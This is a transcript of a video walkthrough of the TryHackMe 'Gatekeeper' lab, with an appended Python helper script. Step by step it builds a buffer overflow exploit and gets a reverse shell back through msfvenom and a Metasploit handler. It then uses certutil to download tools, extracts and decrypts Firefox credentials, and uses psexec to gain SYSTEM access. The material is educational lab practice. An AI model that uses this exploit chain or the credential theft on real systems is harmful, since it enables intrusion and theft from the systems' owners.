TryHackMe Gatekeeper Walkthrough - Buffer Overflow

Captions
Hello everybody, and today we'll be doing Gatekeeper on TryHackMe. This is an awesome room that requires you to write out your own buffer overflow script, so we can actually just do that. Why don't we first just start pinging this machine to make sure it's up, and it is up. Why don't we use threader3000, I'm not sure if that works. Yeah, we can just do python3 threader3000.py, the tool will be in the description below. Let me start that off. It's already finding SMB, I guess we can check that out even while it's running, but we'll just let this run out and see what shows. Okay, and we can see that it is done, the port scan's done, and just type in one and that'll start the nmap on it, so it automatically runs nmap for us. Okay, and we can see that the nmap scan is done and we can just take a look at it. All right, so we do see SMB, we can see it's a Windows machine, it might be a web server. You also see this "Elite", not sure what that is, on port 31337. We can also see Microsoft RPC. Okay, so that's great.

Why don't we check out that SMB first, so smbclient -L, let me just grab the IP address, which we can just do from TryHackMe. Okay, and we can see four shares: ADMIN$, C$, IPC$ and Users. Let me check out that Users, so we can get rid of this -L and we could just put in Users. All right, now we're here, we can ls, we can see Share, so why don't we go into Share. gatekeeper.exe, so we can get that, and just like that. Okay, now we can just move that into our directory, gatekeeper into walkthrough. Okay, so now it is a .exe, so we can't run it on Linux, so why don't we put that onto our Windows machine, which you can have your own virtual machine for, or you can just use the Windows that you're already using. So why don't we go into that walkthrough directory, and to download it onto our Windows machine we can just start up a Python web server, and we just use certutil. So why don't we just minimize this and we can come over here, and why don't we just go to the command prompt first. You've got to make sure your antivirus is off, your Windows Defender and your antiviruses are off, mine's already off because I was doing this room earlier. And you can probably create your own folder for it, I'm just gonna cd into gatekeeper, I think that's what I called it, it's in my Downloads folder and then it's in gatekeeper. Okay, so you can see nothing's in here. Why don't we just start doing that: you do certutil -urlcache -f, now we need to grab our IP, you'll probably want to grab your eth0 IP address, not your tun0, so we can just do that, http://, you can paste that in there, on port 80, and it was called gatekeeper.exe and we'll just call it gatekeeper.exe. Let's see, "certutil completed successfully", you can see gatekeeper right over here.

Okay, so why don't we open up gatekeeper, just do that. "Gatekeeper listening for connections." All right, so why don't we netcat to that port. Let me just grab this, the IP address, netcat -v for verbose, let me paste the IP address in here, and we'll also need to get the port number, which was 31337. So we're just connecting to this IP address on this port right now, we'll see what shows up, and if we come back over here we can see nothing happened. Let's just type in "test", it says "Hello test", so it's actually responding with something. Nothing's really showing up over there. We can try to type in something like "hello" and it seems to be just repeating this message, "Hello" and whatever you type, with three exclamation marks. So all right guys, I made a mistake over there, so you're not supposed to connect to this one, you're supposed to connect to your own IP address, so we just missed that, no wonder we weren't getting anything. So yes, you're just gonna need to close out of this for a second, open up Command Prompt, you need to do ipconfig, and we'll need to grab your own IP address of your machine, which is this one if you're on Ethernet, you can just grab that. Oops. And you can just go back over here, netcat to that on port 31337. Okay, that did not work, try that again, see if we have the right IP address. Should be the right one, this one right here, netcat on 31337, "unknown host", I'm not sure why that's happening. Shouldn't be this one, should be this one. Is gatekeeper not open right now? Oh, it's good, it's because gatekeeper is not open, no wonder. All right, sorry for that guys, messed it up so many times in this video. We're gonna do 31337, there we go, now it's working. If we do "test", as you can see it says "Hello test" over here, bytes received 5, bytes sent 14, and you can see we typed in test.

So yeah, why don't we see if we can put in a lot of characters and see what happens then. So we can do print, we just type in python here, it'll put us into this Python thing, and just print "A" times, we can just do 1000. Okay, and now we can also start Immunity Debugger, and if you don't have that you guys can download it, I'll probably leave a link in the description if I remember. But yeah, so we can just click File over here, Attach, you can see where gatekeeper is, right over here, and just click Attach, and something should pop up. Come on, yes, and it's done. All right, so now you want to start it by just clicking this button over here, you can see it's running down here. So why don't we put in a ridiculous amount of A's, so we just zoom in over here, grab these A's, come over here, we can netcat back to that, a ridiculous amount of A's. You see we don't actually get a response, if we look over here we can see nothing shows up. All right, so you can see that it should crash the program, so that's nice. Now we just have to find out where it's actually crashing, so why don't we restart this gatekeeper and I'll start up the debugger again, Attach, and we can start gatekeeper, wherever that is, there it is. We'll just wait for that to load up, come on. Okay, you can see it's running, it's listening for a connection, and we can just do netcat to that and we just do maybe a hundred A's, let's see where it's crashing. Let's just do that over again, print "A" times 100, so that's a hundred A's, you just grab this. Okay, you can see that actually worked, it didn't crash anything, everything's fine. Let's see if we can do print "A" times 200, we can just find out where it's actually crashing, we could write like a script to do this by itself, but let's just see what happens. Nothing's showing up, okay, so that means it crashed, "send failed", and we see Immunity Debugger is lighting up over here, you see 41414141. Okay, so that's pretty much A's, that means it's a bunch of A's, so it worked, we overwrote the EIP. And if you guys don't know what this is and what I'm talking about, you guys can check out The Cyber Mentor's "Buffer Overflows Made Easy" or you can check out his Practical Ethical Hacking course on Udemy, and that's really, really helpful.

So yeah, we overwrote the EIP, but we need to find out where we overwrote the EIP. There's actually like a Metasploit module that we can use that creates a pattern, and you can do this. So why don't we just start this up, we're going to just do gatekeeper again, also start up Immunity Debugger again, we'll just attach this to gatekeeper, we'll let that run. So the Metasploit one, we can just do /usr... oh okay, it's just exiting me out. Okay, so it's ready, so we just do /usr/share/metasploit-framework/tools/exploit/pattern_create.rb. Okay, now we just do -l and the amount of bytes where it crashed, so we crashed it at 200 bytes, and it should give us this random string of characters that we can just copy. And why don't we come back over here, clear, and we can netcat back over here, we'll start up Immunity Debugger, you see it's paused right now, we'll start it up. All right, and now we can type that in there, you see it crashed it, and we come back to Immunity Debugger, you see we have this EIP value over here, 9654138. We just copy that and we come back over here and we use another Metasploit module, we can do /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb. We need to find the offset, which is where it crashes, so I'm going to put -l 200 since it crashed at 200 bytes, and then -q for the EIP value, which is what we grabbed from over here. I am recording, that's great. Okay, and now we just type that in, you can see we found an exact match at 146, so it crashes at 146 bytes, so that's awesome.

And now we can try to see if we actually overwrite the EIP, right, how do we do that? Well, earlier you saw 41414141, right, that's a bunch of A's like we said, so why don't we see if we can overwrite the EIP with just B's. Okay, so we can create a script for this. In my walkthrough directory we can just nano bof.py, and why don't we just put in our shebang here, just to let them know this is a Python script. We need to import sys and import socket. Now I do recommend you watch some sort of Python tutorial first if you have no idea what this is, because I'm not that good, I'm not that good with overflows too, so don't expect the perfect explanation. So now that we've imported sys, import socket, why don't we create a buffer variable. So this buffer will store a certain value, now we'll just do a bunch of A's, right, and we put this b here for bytes, so we're changing this into bytes, and we can do times 146, right, because we got 146 from our Metasploit tool, we found the offset and that's 146. We'll do plus, in bytes again, we'll do "B" times 4. So why are we doing B times 4? Because the EIP is four bytes long, so we'll just do B times 4, and what should happen in Immunity Debugger is we can see for the EIP it'll be 42424242, right, because 42 is B. So why don't we create that buffer variable, and what else do we have to do? We created that buffer variable, but how do we send it to them, right? We need to connect. Okay, so what do we do? We use netcat to connect, right. We can have a try, so try this, and if that doesn't work I'll do something else. So we'll do s = socket.socket(socket.AF_INET, socket.SOCK_STREAM). So what does this mean? socket.AF_INET is pretty much your IP address, and then SOCK_STREAM is the port, okay, we're setting that up to s. So what do we need to do now? We need to connect to it, right, we'll just do s.connect, we've got s over here, right, and now we need to set something inside. What do we need to set? We need to set the IP address, right, and the port. So the IP address, we need to set that to our Windows IP address, and I think I remember it, 192.168.0.110, and then you'll need to set the port, which is 31337. Okay, so now that we've connected to it, what do we need to do? We need to send them something, right, we need to send them the A's and the B's. So how do we do that? We'll just do s.send, so we'll send it to this IP address on that port, we'll just add that buffer variable, because we already set the variable, right, it's 146 A's and four B's. So we'll just do buffer plus, in bytes, "\r\n", and what this is called is a carriage return, and it's pretty much equivalent to pressing Enter on Windows. So okay, now we'll just do s.close, we'll just close out of that, and we'll just do except over here, because we put in a try statement, which means try this and if this doesn't work I'll do something down here, so we can just do print "error", and we'll just do sys.exit, so close out of it. Okay, so that's nice.

And we'll see, we started up our gatekeeper and everything, we'll restart this gatekeeper and we'll also start up Immunity Debugger, we'll do Attach, gatekeeper, Attach. Okay, now let's start it up, it's running, now let's run our script, so we'll do python bof.py. You can see something went wrong, "invalid syntax", okay, what did I do wrong? Ah, it has to be the connect, oh, I forgot to put it in quotes, so in your IP address over here you'll want to put this into quotes, just like that. Let's rerun it and you see it executed, over here you can see 42424242, so that means we overwrote the EIP with the B's, right, so that worked.

So what do we do now? We need to find bad characters. So when creating a payload we don't wanna use a bad character, otherwise it'll mess up and it'll fail. So how do we do that? First we need to get a list of bad characters, and we can just Google that, so we'll just Google "buffer overflow bad characters list". Okay, so "bad characters list buffer overflow", you see this one, Bulb Security, we'll load that. Okay, see we have a list of bad characters, we'll just copy this, come back over here, why don't we just nano bof.py, we'll just create a badchars variable, so we'll just do this over here, just paste it in, we'll turn all these into bytes, so let's put b, oops, okay, so now that works. And we need to also send this with s.send, right, we need to send it along with our A's and B's, we also need to send the bad characters over, so we'll just do plus badchars plus, and we'll do the carriage return, and that should be it. So why don't we restart our Immunity Debugger and everything, we'll just do gatekeeper, we'll also do Immunity Debugger, okay, we'll do Attach, just type, press G, and we'll do Attach, and okay, it's paused, we'll just press run. Now we'll come back down here, now we'll run our script again, python bof.py, let's see, it executed, it successfully crashed the program, the 42s are there again.

So to find the bad characters, what we need to do is come over here to this ESP, right, right-click it and click Follow in Dump. Okay, you can see it's right here, it starts over here, 01 02 03 04 05 06 07. Now I understand it's really, really small, I'm pretty sure there's a way to make the text bigger, I'm not sure how, yeah, it's pretty small, but you'll pretty much wanna check through all these characters and make sure nothing's wrong in there. So by default the null byte, \x00, will always be a bad character, so just remember that when we're making our payload. So you can just check through all these individually to see if anything's wrong, so you see 01 02 03 04 05 06 07 08 09, and you see 00, there should be 0a, so I'm not sure if that's a bad character or not, but it's okay, we'll just add that to our bad characters just in case. I'm gonna see 0b 0c 0d 0e 0f 10 11 12 13 14, it'll just keep going on and on, you can check through all these, but I already know because I already did it. So yeah, so that's fine.

So now what do we need to do, now that we found the bad characters? What we need to do is find the right module to attack. So we'll do that with mona modules, and I'll leave the link to the GitHub in the description below. Also, you guys should watch "Buffer Overflows Made Easy" by The Cyber Mentor or his Practical Ethical Hacking course, he goes over this stuff way better than I ever can. So why don't we do that, we'll restart Immunity Debugger, we'll start gatekeeper, we'll start Immunity Debugger, and we can check to find out what module we should attack. So why don't we attach this to gatekeeper, and once you install it you'll be able to run it from Immunity Debugger, so let's let that start up. Okay, and down here we can just do !mona modules. All right, okay, so now you get the module information, you gotta find out which module you want to attack, right. It's best to pick one that's false, like everything here false, false, false all across. We don't actually see that, but this one's as close as we can get, because everything's false here except for this one, and it's actually gatekeeper.exe, so we'll attack gatekeeper.exe. So what you want to do now is you want to find the JMP ESP, you want to find the return address, pretty much. So the way you do that, again, please watch "Buffer Overflows Made Easy" because he'll explain it way better than I can. So we'll do !mona find -s "\xff\xe4", it's pretty much FF E4, which is the JMP ESP, -m for the module, gatekeeper. You can see right here the results, you see it right over here, let's see, you can see \xff\xe4, and over here you can see the module name. So why don't we just copy that down, so it's 0x080414c3, just copy that, we'll come back over here, nano our buffer overflow, and we also need to delete these bad characters. I'm not sure how to do that from nano, so I'll just use gedit to do that, so I can select all of this and delete it all at once, just delete that, save that, okay. Now nano our buffer overflow again. All right, so now what do we need to know? We need to attack that certain module, so over here we can just type in something, we'll just comment it out, because we have to change it, right, because we need to write this backwards, pretty much. So how do we write this backwards? So first, why don't we get rid of these B's over here, I don't think we'll need that. So plus, and again we need to do some bytes, so how do we write it backwards? We'll need to do \xc3, right, two characters, and then that, and we'll do \x14, \x04, \x08. Okay, so that's how we write it backwards.

So now what do we need to do, now that we found the right module to attack? What we need to do now is actually try to exploit this machine, right. So first we'll need to add something called the NOP, which The Cyber Mentor explains is kind of like padding, so we just do that with plus, b for bytes, and we'll just do \x90 times 32. Okay, but now what we need to do is we need to encode shellcode, right, shellcode. So how do we do that? We need to use msfvenom, you know. So let me come back over to pentest.ws, it'll make things a lot easier for us, and we'll just come over here to Venom Builder, if this will ever load, this is really slow, come on, load up for me. Okay, now I'll come over here to Venom Builder, and I already set this up already, so you'll probably see it, but we'll do windows/shell/reverse_tcp, we'll set the LHOST to our IP address, our TryHackMe... well actually no, we'll need to set it to our eth0 address, because first we have to attack our machine, we're attacking our Windows machine, we're not attacking Gatekeeper yet. Let's hope it's not running out of time, we'll just add an hour. We'll set that to our eth0 address, we can just set it to 6969, that's the LPORT. Bad characters, we went over this, the null byte will always be a bad character, I didn't see 0a in there so I'm not sure if that's a bad character or not, but I'll just put it in. So format, we'll just do python. Out file, we don't want to add it to any file unless you want to, I don't see the point in that. So now we'll just copy this command, come over here, let that msfvenom run, I'll see the plus, and we'll wait for msfvenom to complete, and it completed. Okay, and you can see it's turning it into bytes by itself already, so we can just copy all this, come back over here to our script, let's paste this in. Now this is already set up for us, you can just copy and paste it directly, because buf, it's setting it to nothing at first and it's adding to it, plus-equals means whatever buf is right now, add this to buf, right, so it's putting it all in buf for us. So we can just come back over here and we'll just plus buf, right, we'll plus buf, which is the shellcode. Okay, so everything should be completed for us. For the bad characters, yeah, we don't need that in here, so we'll just remove that, so we'll just include the buffer and it will include a carriage return, and that should be good for us, it should give us a shell. So let's just make sure it's running properly, yes, it's running, python bof.py. Oh shoot, we did not set up a listener, so that's probably why it failed. Okay, we'll close out of this gatekeeper, I'll start up Immunity Debugger, I'll just actually start up msfconsole, clear console. I'm not sure why Immunity Debugger looks like that, Immunity Debugger, okay, that is weird, why does it look like this, whatever, yeah, whatever, let's just attach the gatekeeper anyways, and we'll come over here, we'll use multi/handler, we're done with Immunity Debugger anyways. Okay, just use multi/handler, we'll set our payload to windows/shell/reverse_tcp, we'll set our LHOST to 192.168.10106, which is our eth0 address on our Kali machine, so I'll put the 6969, we'll start running that. And we can see that, yeah, it's up, gatekeeper's up, so we'll just start that up, we can just do python bof.py, that should give us a shell. Let's give us a shell. Let's check our script again, see what we did wrong, I think it should be right, I'm not sure what we did wrong, c3 14 04 08, so that's right, connecting correctly, so what did we do wrong? Let's try this again, did it even crash? It should have crashed, I think it did. Let's start the gatekeeper again, just one more time. Okay, yeah, and we got a command shell, I don't know what happened the first time. Okay, so whoami, we should see pc1, which is my Windows, so it worked, everything worked.

So what do we need to do now? We need to actually attack the actual TryHackMe Gatekeeper, right, so why don't we do that. We can just exit out of this, we can come back, so we can't just use the same script, okay, we need to change a couple of things. First we need to change our payload, our LHOST. So why don't we just do ifconfig, we'll grab our TryHackMe IP address and we'll just set that up over here, we'll do 9696, and we'll just copy this and paste that in. We'll need to edit our script, so nano bof.py. So what do we need to fix? We need to change s.connect, we need to connect to the actual TryHackMe machine, so why don't we come back over here and grab the IP address, paste that in there, and everything should be good to go. And we also need to change this, so let's just copy this, gedit, we'll delete all this, paste this in, we'll save it, okay, it's done. All right, so now why don't we start the listener. Where is our... okay, show options, set LHOST to be tun0, then we change that, okay, clear, run, and why don't we just run. "Command shell session 2 opened", yes, and we got a shell, let's just do whoami. Oops, what did we do there? whoami, we are not NT AUTHORITY\SYSTEM. Oh man, you know, I was disappointed at this when I first did the machine, I went through all that work and I still wasn't SYSTEM, but there is privesc here, so that's annoying.

If we just do dir, you can see your user.txt is here. So why don't we upload... well, first let's just do whoami /priv. Okay, see we don't really have anything here. Why don't we upload winPEAS. Okay, so we just play around here, there's an opt folder, pi web, so we'll just do, what, I don't want to put it here, I'll put it in Pictures, there's nothing here. Okay, certutil -urlcache -f http://, I need our IP address, so why don't we just do ifconfig, copy that, come back over here, port 80, winPEAS.exe, winPEAS.exe. We'll see if that works, okay, and now it's completed. We'll just do dir, winPEAS.exe, so why don't we run winPEAS.exe now. Yeah, we see it doesn't, it's not starting up right, it's not working, and I can tell you that this is on purpose. So I'll see if I can background that, yeah, that's... I don't think winPEAS was supposed to be able to run, I wasn't able to get it to work on the first time around. Let's see if I can go back into that session, yeah, it's messed up and it closed. Okay, I'm going to re-exploit it. Run this again, whoa, python buffer overflow, I got a command shell. Okay, so why don't we background this, and first let's upgrade it to meterpreter just so it's easy to work with, I'll just do shell_to_meterpreter, it usually doesn't work right away, I'm not sure, sometimes it's still slow. set LHOST to be tun0, set SESSION, run, and this will pretty much upgrade our shell to our meterpreter shell. Okay, yeah, and that didn't work, I'm not sure why. Let's see, it's still running here, I usually have to wait a while and I don't know, it just comes back with something, but it's fine, we don't really need it right now. But why don't we do search post windows, we'll just do enum_applications, 0, show options, and this will enumerate the applications that are on the machine. So we set our session to, what, three, four? It's three, I believe, three. Now let's just run this, "really, session may not be compatible", come on. Background, sessions, okay, I'm not sure if shell_to_meterpreter didn't work, but we can upgrade it a different way. Why don't we just use msfvenom again, we'll just do 1234, same IP address, we'll change this to meterpreter, I'm not sure if this will work, characters, out format, what is this, exe, out file to be meterpreter, we'll just do shell.exe, I'll just copy this. Yeah, we'll just kill all jobs, oops, yeah, that worked. Let me go back over here and kill this job, clear, and it worked. Okay, we'll just move the shell.exe to the walkthrough folder, see, walkthrough, pi web, and we'll just go back to the sessions, -i 3, okay, and we'll see the, dir, cd Pictures, we'll certutil this over, certutil, the address again, because I keep forgetting it, I never remember the IP address or anything other than CyberSecLabs because they made it easy to remember. Oops, okay, use your arrows, port 80, we'll grab our shell.exe, we'll call it shell.exe, come on, okay, and it's completed. Okay, we're going to background this session, use multi/handler, show options, set LPORT to be 1234 and set payload to be windows/meterpreter/reverse_tcp, run -j as a job, so it's running in the background. We'll do sessions, that's right, three, there, shell.exe, and we got a meterpreter session open. So why don't we do sessions -i 4, background the first session, -i 4, and we're meterpreter, and we can just do getuid. Now we can run meterpreter commands, let's probably run post/windows/gather, oops, post/windows/gather/enum_applications, now it's enumerating applications installed on Gatekeeper. All right, and we actually got something back. All right, what's most interesting right now would be Firefox, so we can try to enumerate, we can try to find out what the credentials that are stored in Firefox are. We can just do that with another Metasploit module, we can just do post/multi/gather/firefox_creds, so now it's grabbing its credentials, let's let that run.

All right, and it's done, it downloaded all that stuff from this, so now we actually need to decrypt all these files. So why don't we come back over here, I have a lot of terminals open, just cancel this one out, delete it, okay. And I wonder where it downloaded to, so if I download it to my... oh no, where is it, where did it download to, where did I start Metasploit at, my gosh, I started Metasploit somewhere, so it should be in here, where, where did it save that, is it here, where is it, oh, oh, it's .msf4, so it's here. Okay, what if we do ls -la for it, so we can just move that, .msf4, move that, first of all I want to rename it first, I'll mv it to firefox just so we can actually see it, it's right there, firefox, we can move firefox into our walkthrough directory, cd walkthrough, let's see, firefox, ls, loot, we're going to loot. So now we need to decrypt this, we can, I think we can just search "firefox decrypt", see, it's right here, I'll leave a link to it in the description too, yeah, should be this one, this is the one, yes it is. So you just git clone this, I already have it, but yeah. So now we need to rename all this to these names, so why don't we just rename this, we can just copy this and we can just rename this to, what is it, like that. We need to do this for every single one of these files, so we did this one, now we need to do this one, and like that, oops, okay. Now this one, we need to rename that to this, and now with the last one, just copy this, come back over here, plugins. Okay, now that we have all these renamed we can come back over here to cd /opt, and it's in my firefox_decrypt, ls, and that's firefox_decrypt. So let's do python firefox_decrypt.py, but I'm pretty sure we just include the directory to it, so let's do, it's our home directory, and it's in our walkthrough, it's in the firefox, and loot, enter, and you see we got some credentials. Okay, username mayor, the person who made this room, and now we have the password. So how do we log in, right?

We saw SMB earlier, right, we saw SMB and some writable shares, so why can't we use psexec, right. So let's locate psexec, it's right over here, and we'll just do python psexec.py, I forgot how to use this, oh boy. I think we need, these, mayor, I think it was, colon, password, at the IP address, and so, use it, yes it is. Okay, great, and we should be able to log in, "found writable share ADMIN$", so that's on SMB, and it found the writable share and uploaded that file, and then we just do whoami, NT AUTHORITY\SYSTEM, that's awesome. And cd, cd \Users, and there's no admin, there's no admin folder, the root flag is in mayor, so that's actually in Desktop, it's going to go through all these, come on, so slow, okay, cd Desktop, now we can do cd Desktop, dir, you can see that's your root flag right over there. All right guys, I hope you really enjoyed this video, I've certainly enjoyed doing this room, shout out to you mayor, you're an amazing person and you made an amazing room, I really loved doing it. The privilege escalation, I was not expecting it when I first did it, so yeah, I hope you guys really enjoyed this video, I really enjoyed making this video. I think this is the first medium difficulty room I did on TryHackMe that I'm making a video on, so it's amazing, I really like this room. It's actually a free room too, my subscription ended, I'm still able to do it, so this room is free and I seriously, you guys should really do it, it's a really, really fun room. And if you guys like this video please leave a thumbs up and subscribe to me if you haven't, and yeah, I'll see you guys in the next video, bye.
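The offset, little-endian and bad-character steps that the walkthrough above performs with pattern_create.rb, pattern_offset.rb, a hand-reversed address and a visual read of the Immunity dump, as an added Python example (not the video's own bof.py): it reimplements the cyclic pattern and offset lookup, packs the 0x080414c3 return address, and compares the sent bytes with a copy of the stack dump instead of eyeballing it. The EIP value 0x39654138 and the dump that mangles 0x0a are constructed assumptions (the captions read the EIP as "9654138"); 0x39654138 is chosen because it is exactly what the pattern bytes at offset 146 produce.

```python
#!/usr/bin/env python3
"""Stack-overflow analysis helpers for the Gatekeeper crash described above.

Added example, not the video author's script. Reimplements what the
walkthrough does with Metasploit's pattern_create.rb / pattern_offset.rb,
by hand for the little-endian return address, and by eye in Immunity
Debugger's "Follow in Dump" view for bad characters.
"""
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (unique 4-byte windows)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern: bytes, eip: int) -> int:
    """Offset of the 4 pattern bytes that landed in EIP, or -1 if not found.

    x86 is little-endian, so a register reading 0x39654138 corresponds to
    the in-memory bytes b"8Ae9".
    """
    needle = struct.pack("<I", eip)
    return pattern.find(needle)


def pack_return_address(addr: int) -> bytes:
    """Little-endian encoding of a 32-bit address: 0x080414c3 -> \\xc3\\x14\\x04\\x08."""
    return struct.pack("<I", addr)


def build_badchars(exclude=frozenset({0x00})) -> bytes:
    """Every byte value except the ones already known to be bad (0x00 by default)."""
    return bytes(b for b in range(0x100) if b not in exclude)


def find_bad_chars(sent: bytes, dump: bytes) -> list:
    """Compare the bytes sent with what landed on the stack and return the
    sent byte at which the two first diverge.

    Stops at the first corruption, since everything after a mangled byte is
    usually shifted; exclude that byte and rerun until the copy is clean.
    """
    for want, got in zip(sent, dump):
        if want != got:
            return [want]
    if len(dump) < len(sent):
        # Truncated copy: the next byte terminated the string (e.g. 0x00, 0x0a).
        return [sent[len(dump)]]
    return []


def address_is_clean(addr: int, badchars) -> bool:
    """True when the packed return address contains none of the bad bytes."""
    return not any(b in badchars for b in pack_return_address(addr))


def demo():
    """Constructed scenario mirroring the walkthrough's numbers."""
    pat = pattern_create(200)
    offset = pattern_offset(pat, 0x39654138)   # assumed EIP -> 146
    ret = pack_return_address(0x080414c3)      # JMP ESP from !mona find
    # Constructed dump: the target copied our bytes but turned 0x0a into 0x00.
    sent = build_badchars({0x00})
    dump = sent.replace(b"\x0a", b"\x00")
    bad = find_bad_chars(sent, dump)           # -> [0x0a]
    clean = address_is_clean(0x080414c3, {0x00, 0x0a})
    return offset, ret, bad, clean


if __name__ == "__main__":
    print(demo())
```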
Info
Channel: SkillsMasters
Views: 7,769
Keywords: tryhackme, cyberseclabs, hackthebox, gatekeeper, walkthrough, tryhackme gatekeeper walkthrough, tryhackme gatekeeper, tryhackme gatekeeper writeup, buffer overflow, buffer overflows, buffer, overflow, overflows, exploit development, exploit creation, creating exploit, binary exploitation, metasploit, mona modules, what is a buffer overflow, firefox decrypt, application enumeration, bad characters, creating buffer overflow, developing exploit, making exploit, BOF, BOFs, buffers, hacking
Id: ALbNTOOqmsA
Length: 42min 20sec (2540 seconds)
Published: Mon Aug 31 2020